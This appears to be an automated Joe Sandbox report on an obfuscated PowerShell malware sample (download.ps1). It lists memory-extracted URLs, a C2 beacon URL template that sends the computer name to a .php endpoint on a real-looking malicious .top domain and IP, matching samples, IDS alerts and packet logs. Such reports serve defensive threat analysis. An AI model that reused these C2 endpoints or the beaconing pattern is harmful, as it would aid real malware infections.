                                                                  http://$iba40z739y1rlcp/$nfe6owql0ibuxm9.php?id=$env:computername&key=$rsbjcivwtqdkf&s=527powershell.exe, 00000000.00000002.1849552252.000001A1C0B98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1849552252.000001A1C1E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1849552252.000001A1C0B98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://drive.google.com/?tab=wopowershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://contoso.com/Iconpowershell.exe, 00000000.00000002.1880657430.000001A1D09E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://0.googlepowershell.exe, 00000000.00000002.1849552252.000001A1C2152000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://cmacnnkfbhlcncm.toppowershell.exe, 00000000.00000002.1849552252.000001A1C20CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1849552252.000001A1C1E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://mail.google.com/mail/?tab=wmpowershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.google.com/logos/doodles/2024/rise-of-the-half-moon-december-6753651837110600-2xa.gifXpowershell.exe, 00000000.00000002.1849552252.000001A1C2152000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1849552252.000001A1C0B98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.youtube.com/?tab=w1powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://0.google.powershell.exe, 00000000.00000002.1849552252.000001A1C2152000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://lh3.googleusercontent.com/ogw/default-user=s96Xpowershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://0.google.com/powershell.exe, 00000000.00000002.1849552252.000001A1C2152000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://lh3.googleusercontent.com/ogw/default-user=s24powershell.exe, 00000000.00000002.1880657430.000001A1D0B49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://www.google.com/history/optout?hl=enpowershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://books.google.com/?hl=en&tab=wppowershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://translate.google.com/?hl=en&tab=wTpowershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.1849552252.000001A1C0B98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.google.com/intl/en/about/products?tab=whXpowershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://calendar.google.com/calendar?tab=wcpowershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://aka.ms/pscore68powershell.exe, 00000000.00000002.1849552252.000001A1C0971000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://lh3.googleusercontent.com/ogw/default-user=s24Xpowershell.exe, 00000000.00000002.1849552252.000001A1C22FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              • No. of IPs < 25%
                                                                                                              • 25% < No. of IPs < 50%
                                                                                                              • 50% < No. of IPs < 75%
                                                                                                              • 75% < No. of IPs
                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                              172.217.19.228
                                                                                                              www.google.comUnited States
                                                                                                              15169GOOGLEUSfalse
                                                                                                              45.61.136.138
                                                                                                              cmacnnkfbhlcncm.topUnited States
                                                                                                              40676AS40676USfalse
                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                              Analysis ID:1579457
                                                                                                              Start date and time:2024-12-22 13:41:05 +01:00
                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                              Overall analysis duration:0h 4m 27s
                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                              Report type:full
                                                                                                              Cookbook file name:default.jbs
                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                              Number of analysed new started processes analysed:7
                                                                                                              Number of new started drivers analysed:0
                                                                                                              Number of existing processes analysed:0
                                                                                                              Number of existing drivers analysed:0
                                                                                                              Number of injected processes analysed:0
                                                                                                              Technologies:
                                                                                                              • HCA enabled
                                                                                                              • EGA enabled
                                                                                                              • AMSI enabled
                                                                                                              Analysis Mode:default
                                                                                                              Analysis stop reason:Timeout
                                                                                                              Sample name:download.ps1
                                                                                                              Detection:MAL
                                                                                                              Classification:mal76.evad.winPS1@2/7@2/2
                                                                                                              EGA Information:Failed
                                                                                                              HCA Information:
                                                                                                              • Successful, ratio: 100%
                                                                                                              • Number of executed functions: 14
                                                                                                              • Number of non-executed functions: 3
                                                                                                              Cookbook Comments:
                                                                                                              • Found application associated with file extension: .ps1
                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                                              • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 6884 because it is empty
                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                              TimeTypeDescription
                                                                                                              07:42:04API Interceptor47x Sleep call for process: powershell.exe modified
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              45.61.136.138download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • cmacnnkfbhlcncm.top/kzqvgnd7b0htr.php?id=computer&key=74093808379&s=527
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • cmacnnkfbhlcncm.top/yudn6r4exvhtr.php?id=computer&key=71902578316&s=527
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • cmacnnkfbhlcncm.top/4sqjhclnathtr.php?id=user-PC&key=146061803000&s=527
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • cmacnnkfbhlcncm.top/5jmw10tyqfhtr.php?id=user-PC&key=113750624201&s=527
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • cmacnnkfbhlcncm.top/o019zcxwsfhtr.php?id=user-PC&key=94248264203&s=527
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • cmacnnkfbhlcncm.top/lbs39er51ghtr.php?id=computer&key=31400257058&s=527
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • cmacnnkfbhlcncm.top/xqceolfz5dhtr.php?id=user-PC&key=58037436404&s=527
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • cmacnnkfbhlcncm.top/cmx2nrhlu7htr.php?id=computer&key=24412706494&s=527
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • cmacnnkfbhlcncm.top/57fd316pguhtr.php?id=computer&key=75439930857&s=527
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • cmacnnkfbhlcncm.top/rz932vog4whtr.php?id=user-PC&key=63562548914&s=527
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              cmacnnkfbhlcncm.topdownload.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              AS40676USdownload.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 107.160.112.122
                                                                                                              QCTYoyX422.dllGet hashmaliciousUnknownBrowse
                                                                                                              • 107.160.131.254
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 23.179.110.68
                                                                                                              No context
                                                                                                              No context
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):64
                                                                                                              Entropy (8bit):1.1940658735648508
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Nlllulfj+l/Z:NllUa
                                                                                                              MD5:AEC655F8EE3DD3150DA36365EB66C091
                                                                                                              SHA1:3E4FCCFC1CE43B9802B56898F261467781DB1D33
                                                                                                              SHA-256:9E9E998CAC647B8C511C01A7983633D5DB70C5EC748AD488FE78898A89AB6270
                                                                                                              SHA-512:D98A7A562D940B4DCDA2ECB91DAC0046FD635425E8CF2A8A0646D693050C6A26BB0D704197DCE51E8EDFDD7EBC322B89E1D5FDEB76189B2CF523A0490473F9E0
                                                                                                              Malicious:false
                                                                                                              Reputation:moderate, very likely benign file
                                                                                                              Preview:@...e................................................@..........
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Reputation:high, very likely benign file
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Reputation:high, very likely benign file
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):6221
                                                                                                              Entropy (8bit):3.7159553476630633
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:/I+98SPLPr3C4U28zojJbukvhkvklCywEmdJqRyugYT2loQ7SogZoptVtLpqRyuj:gqP33CxH84kvhkvCCtdZtnEHGZtnbHQ
                                                                                                              MD5:02E21EEE84AF66A7C5914FD894F305E4
                                                                                                              SHA1:8FB39B59AAF170AB715DAE406E13DAB1CE8F5A7A
                                                                                                              SHA-256:64E3202F4B426A835AAC95B1C69023BF66F25E08485218104AD70DA41C50957F
                                                                                                              SHA-512:A2BBD2B57D8F53DC9F032538CEA1B0FE0EA84D82C6E552FC5C58369871BAC9DAC6D683AE731BF8D52395AAF789C4513BE8819BB7E541B3471B1468AE94FECBF7
                                                                                                              Malicious:false
                                                                                                              Preview:...................................FL..................F.".. ...-/.v.....N~.nT..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....=...nT......nT......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y@e...........................%..A.p.p.D.a.t.a...B.V.1......Y<e..Roaming.@......CW.^.Y<e..........................W...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.YAe..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWS`..Windows.@......CW.^DWS`..........................8X0.W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.YAe....Q...........
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):6221
                                                                                                              Entropy (8bit):3.7159553476630633
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:/I+98SPLPr3C4U28zojJbukvhkvklCywEmdJqRyugYT2loQ7SogZoptVtLpqRyuj:gqP33CxH84kvhkvCCtdZtnEHGZtnbHQ
                                                                                                              MD5:02E21EEE84AF66A7C5914FD894F305E4
                                                                                                              SHA1:8FB39B59AAF170AB715DAE406E13DAB1CE8F5A7A
                                                                                                              SHA-256:64E3202F4B426A835AAC95B1C69023BF66F25E08485218104AD70DA41C50957F
                                                                                                              SHA-512:A2BBD2B57D8F53DC9F032538CEA1B0FE0EA84D82C6E552FC5C58369871BAC9DAC6D683AE731BF8D52395AAF789C4513BE8819BB7E541B3471B1468AE94FECBF7
                                                                                                              Malicious:false
                                                                                                              Preview:...................................FL..................F.".. ...-/.v.....N~.nT..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....=...nT......nT......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y@e...........................%..A.p.p.D.a.t.a...B.V.1......Y<e..Roaming.@......CW.^.Y<e..........................W...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.YAe..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWS`..Windows.@......CW.^DWS`..........................8X0.W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.YAe....Q...........
                                                                                                              File type:ASCII text, with very long lines (10807), with CRLF line terminators
                                                                                                              Entropy (8bit):5.967537423142359
                                                                                                              TrID:
                                                                                                                File name:download.ps1
                                                                                                                File size:20'400 bytes
                                                                                                                MD5:f710ad70e1fe42d5174f289867a61f93
                                                                                                                SHA1:5d2c8485c88fef6f88db24094b6b39f1628825a7
                                                                                                                SHA256:d9eb14b6a8ce5658354baad69321096594b107cfa096fb7468d8f1c9c02487e5
                                                                                                                SHA512:7ed8d3e11da5c1f5b0f86190e852ce9e3fa98c07101c22110f108c7a4bf1339a6b4f696bc35a309d0c9542ec464580962dc08ebeb52620c63387c48b7a566f11
                                                                                                                SSDEEP:384:ydnyLO8CeZInjVd9bhy2WjuyV1ljr7pwL8f4nqfxnTCtxn:ydyS3eZUdxnk1lqL8wnqJy
                                                                                                                TLSH:33925CA17B84E8E4C29AC23F5607FC183B6A753BD0DBBBC4F658D6D163916112E8DC80
                                                                                                                File Content Preview:$yfnvsdrmbckahu=$executioncontext;$edinbereonreenarateran = ([ChAR[]]@((-9940+(15808-(54346990/(13314-(-160+(19740096/4782)))))),(-3882+(9853-5919)),(6133-(156+(10342-(12421-(8910886/(-5446+6560)))))),(-9511+(4532+5029)),(2970-2914),(-285+(-5554+(7623-173
                                                                                                                Icon Hash:3270d6baae77db44
                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                2024-12-22T13:42:07.577435+01002859391ETPRO MALWARE TA582 Domain in DNS Lookup1192.168.2.4645771.1.1.153UDP
                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Dec 22, 2024 13:42:07.992449999 CET4973080192.168.2.445.61.136.138
                                                                                                                Dec 22, 2024 13:42:08.112341881 CET804973045.61.136.138192.168.2.4
                                                                                                                Dec 22, 2024 13:42:08.112447023 CET4973080192.168.2.445.61.136.138
                                                                                                                Dec 22, 2024 13:42:08.116451979 CET4973080192.168.2.445.61.136.138
                                                                                                                Dec 22, 2024 13:42:08.236094952 CET804973045.61.136.138192.168.2.4
                                                                                                                Dec 22, 2024 13:42:09.366614103 CET804973045.61.136.138192.168.2.4
                                                                                                                Dec 22, 2024 13:42:09.420442104 CET4973080192.168.2.445.61.136.138
                                                                                                                Dec 22, 2024 13:42:09.509663105 CET4973180192.168.2.4172.217.19.228
                                                                                                                Dec 22, 2024 13:42:09.629640102 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:09.629724979 CET4973180192.168.2.4172.217.19.228
                                                                                                                Dec 22, 2024 13:42:09.630008936 CET4973180192.168.2.4172.217.19.228
                                                                                                                Dec 22, 2024 13:42:09.749937057 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.460381031 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.460499048 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.460515976 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.460557938 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.460592031 CET4973180192.168.2.4172.217.19.228
                                                                                                                Dec 22, 2024 13:42:11.460633039 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.460649967 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.460680008 CET4973180192.168.2.4172.217.19.228
                                                                                                                Dec 22, 2024 13:42:11.460702896 CET4973180192.168.2.4172.217.19.228
                                                                                                                Dec 22, 2024 13:42:11.460882902 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.460899115 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.460915089 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.460932016 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.460942030 CET4973180192.168.2.4172.217.19.228
                                                                                                                Dec 22, 2024 13:42:11.460984945 CET4973180192.168.2.4172.217.19.228
                                                                                                                Dec 22, 2024 13:42:11.580414057 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.580434084 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.580481052 CET4973180192.168.2.4172.217.19.228
                                                                                                                Dec 22, 2024 13:42:11.652421951 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.652513027 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.652564049 CET4973180192.168.2.4172.217.19.228
                                                                                                                Dec 22, 2024 13:42:11.656526089 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.657754898 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.657805920 CET4973180192.168.2.4172.217.19.228
                                                                                                                Dec 22, 2024 13:42:11.657814026 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.666070938 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.666114092 CET4973180192.168.2.4172.217.19.228
                                                                                                                Dec 22, 2024 13:42:11.667258978 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.667365074 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.667412996 CET4973180192.168.2.4172.217.19.228
                                                                                                                Dec 22, 2024 13:42:11.675653934 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.680042028 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.680087090 CET4973180192.168.2.4172.217.19.228
                                                                                                                Dec 22, 2024 13:42:11.680171013 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.685223103 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.685265064 CET4973180192.168.2.4172.217.19.228
                                                                                                                Dec 22, 2024 13:42:11.693744898 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.693933964 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.693985939 CET4973180192.168.2.4172.217.19.228
                                                                                                                Dec 22, 2024 13:42:11.697901011 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.707122087 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.707173109 CET4973180192.168.2.4172.217.19.228
                                                                                                                Dec 22, 2024 13:42:11.707447052 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.711441040 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.711488008 CET4973180192.168.2.4172.217.19.228
                                                                                                                Dec 22, 2024 13:42:11.720686913 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.720819950 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.720863104 CET4973180192.168.2.4172.217.19.228
                                                                                                                Dec 22, 2024 13:42:11.724790096 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.734709024 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.734765053 CET4973180192.168.2.4172.217.19.228
                                                                                                                Dec 22, 2024 13:42:11.772495985 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.772600889 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.772644997 CET4973180192.168.2.4172.217.19.228
                                                                                                                Dec 22, 2024 13:42:11.776346922 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.776418924 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.776462078 CET4973180192.168.2.4172.217.19.228
                                                                                                                Dec 22, 2024 13:42:11.844549894 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.844664097 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.844722033 CET4973180192.168.2.4172.217.19.228
                                                                                                                Dec 22, 2024 13:42:11.846985102 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.847100019 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.847143888 CET4973180192.168.2.4172.217.19.228
                                                                                                                Dec 22, 2024 13:42:11.851856947 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.853686094 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.853734970 CET4973180192.168.2.4172.217.19.228
                                                                                                                Dec 22, 2024 13:42:11.853773117 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.858678102 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.858737946 CET4973180192.168.2.4172.217.19.228
                                                                                                                Dec 22, 2024 13:42:11.858748913 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.863416910 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.863461018 CET4973180192.168.2.4172.217.19.228
                                                                                                                Dec 22, 2024 13:42:11.865982056 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.866112947 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.866156101 CET4973180192.168.2.4172.217.19.228
                                                                                                                Dec 22, 2024 13:42:11.869317055 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.879829884 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.879848003 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.879873991 CET4973180192.168.2.4172.217.19.228
                                                                                                                Dec 22, 2024 13:42:11.881864071 CET8049731172.217.19.228192.168.2.4
                                                                                                                Dec 22, 2024 13:42:11.881911039 CET4973180192.168.2.4172.217.19.228
